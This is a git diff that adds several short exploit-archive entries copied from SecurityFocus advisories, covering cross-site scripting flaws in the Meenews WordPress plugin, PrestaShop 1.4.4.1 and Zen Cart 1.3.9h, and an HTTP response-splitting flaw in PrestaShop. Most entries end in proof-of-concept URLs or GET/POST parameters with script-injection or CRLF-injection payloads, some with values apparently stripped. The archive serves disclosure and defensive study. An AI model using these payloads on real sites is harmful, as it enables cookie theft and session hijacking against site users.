100755 index 000000000..ec6fe7256 --- /dev/null +++ b/platforms/php/webapps/36340.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/50783/info + +Newsletter Meenews Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Newsletter Meenews 5.1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/wp-content/plugins/meenews/newsletter.php?idnews=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36341.txt b/platforms/php/webapps/36341.txt new file mode 100755 index 000000000..666b961b6 --- /dev/null +++ b/platforms/php/webapps/36341.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/50784/info + +PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected. + +GET: http:///modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php +POST: num_mode= \ No newline at end of file diff --git a/platforms/php/webapps/36342.txt b/platforms/php/webapps/36342.txt new file mode 100755 index 000000000..570697b4f --- /dev/null +++ b/platforms/php/webapps/36342.txt 
@@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/50784/info + +PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected. + +http://www.example.com/modules/mondialrelay/googlemap.php?relativ_base_dir=>');alert('XSS'); +http://www.example.com/modules/mondialrelay/googlemap.php?relativ_base_dir=">');alert('XSS'); +http:///modules/mondialrelay/googlemap.php?Pays=');alert('XSS'); \ No newline at end of file diff --git a/platforms/php/webapps/36343.txt b/platforms/php/webapps/36343.txt new file mode 100755 index 000000000..bb314cf56 --- /dev/null +++ b/platforms/php/webapps/36343.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/50784/info + +PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected. + +GET: http:///modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php +POST: Expedition= \ No newline at end of file diff --git a/platforms/php/webapps/36344.txt b/platforms/php/webapps/36344.txt new file mode 100755 index 000000000..98a5bf0c3 --- /dev/null +++ b/platforms/php/webapps/36344.txt 
@@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/50784/info + +PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected. + +GET: http:///admin/ajaxfilemanager/ajax_save_text.php +POST: folder=&name= \ No newline at end of file diff --git a/platforms/php/webapps/36345.txt b/platforms/php/webapps/36345.txt new file mode 100755 index 000000000..20eb85094 --- /dev/null +++ b/platforms/php/webapps/36345.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/50785/info + +Prestashop is prone to an HTTP-response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data. + +Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid various attacks that try to entice client users into a false sense of trust. + +Prestashop 1 4.4.1 is vulnerable; other versions may also be affected. + +GET: http://www.example.com/admin/displayImage.php?img=&name=asa.cmd"%0d%0a%0d%0a@echo off%0d%0aecho running batch file%0d%0apause%0d%0aexit +Note: The is the name of one file existing on the "upload/" folder. It's name must be a MD5 hash, without any extension. ex: "435ed7e9f07f740abf511a62c00eef6e" diff --git a/platforms/php/webapps/36346.txt b/platforms/php/webapps/36346.txt new file mode 100755 index 000000000..1ac6f167b --- /dev/null +++ b/platforms/php/webapps/36346.txt 
@@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/50787/info + +Zen Cart is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Zen Cart 1.3.9h is vulnerable; other versions may also be affected. + +GET: https://www.example.com/index.php?main_page=gv_send&action=send +POST: message=</textarea>